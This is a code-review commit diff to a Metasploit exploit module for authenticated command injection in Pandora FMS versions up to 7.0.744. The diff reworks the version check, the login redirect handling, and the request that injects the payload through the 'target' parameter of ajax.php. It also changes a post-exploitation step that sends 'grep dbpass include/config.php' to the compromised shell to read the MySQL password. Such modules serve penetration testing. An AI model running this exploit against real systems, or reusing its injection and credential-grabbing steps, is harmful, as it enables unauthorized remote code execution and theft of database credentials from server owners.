Incorporate suggestios from code review

modules/exploits/linux/http/pandora_fms_events_exec.rb

@@ -83,23 +83,23 @@ class MetasploitModule < Msf::Exploit::Remote
     html = res.get_html_document
     full_version = html.at('div[@id="ver_num"]').text
 
-    unless full_version && (!full_version.to_s.eql? '')
+    if full_version.blank?
       return CheckCode::Detected('Could not determine the Pandora FMS version.')
     end
 
     version = full_version[1..-1].gsub!('NG', '')
 
-    unless version && (!version.to_s.eql? '')
+    if version.blank?
       return CheckCode::Detected('Could not determine the Pandora FMS version.')
     end
 
     version = Gem::Version.new version
 
     unless version <= Gem::Version.new('7.0.744')
-      return CheckCode::Safe("Target is Pandora FMS with version #{full_version}.")
+      return CheckCode::Safe("Target is Pandora FMS version #{full_version}.")
     end
 
-    CheckCode::Appears("Target is Pandora FMS with version #{full_version}.")
+    CheckCode::Appears("Target is Pandora FMS version #{full_version}.")
   end
 
   def login(user, pass)
@@ -125,15 +125,13 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with Failure::NoAccess, 'Authentication failed'
     end
 
-    redirect = res.headers['Location']
-
-    unless redirect && redirect.to_s != ''
+    if res.headers['Location'].to_s == ''
       fail_with Failure::NoAccess, 'Authentication failed'
     end
 
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => redirect,
+      'uri' => res.headers['Location'],
       'cookie' => @cookie
     })
 
@@ -146,28 +144,30 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_new_session(client)
     super
-    print_status('Trying to read the MySQL DB password via `cat include/config.php | grep dbpass`. The default privileged user is `root`.')
-    command = 'cat include/config.php | grep dbpass'
-    client.shell_write(command + "\n")
+    print_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.')
+    client.shell_write("grep dbpass include/config.php\n")
   end
 
   def execute_command(cmd, _opts = {})
     print_status('Executing payload...')
-    referer_url = normalize_uri(target_uri.path, 'index.php', '?sec=eventos&sec2=operation/events/events')
-    data = 'page=include/ajax/events&perform_event_response=10000000'
-    data << "&target=#{cmd}"
-    data << '&response_id=1'
+    referer_url = normalize_uri(target_uri.path, 'index.php')
 
-    # using a raw request to prevent the post data from being encoded, which would prevent exploitation
-    send_request_raw({
+    send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'ajax.php'),
       'cookie' => @cookie,
-      'headers' => {
-        'Referer' => "http://#{datastore['RHOSTS']}#{referer_url}",
-        'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8'
+      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
+      'Referer' => "http://#{datastore['RHOSTS']}#{referer_url}",
+      'vars_get' => {
+        'sec' => 'eventos',
+        'sec2' => 'operation/events/events'
       },
-      'data' => data
+      'vars_post' => {
+        'page' => 'include/ajax/events',
+        'perform_event_response' => '10000000',
+        'target' => cmd.to_s,
+        'response_id' => '1'
+      }
     }, 0) # the server will not send a response, so the module shouldn't wait for one
   end
 
@@ -180,6 +180,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     login(datastore['USERNAME'], datastore['PASSWORD'])
-    execute_command payload.encoded.gsub(/&/, '%26')
+    execute_command payload.encoded
   end
 end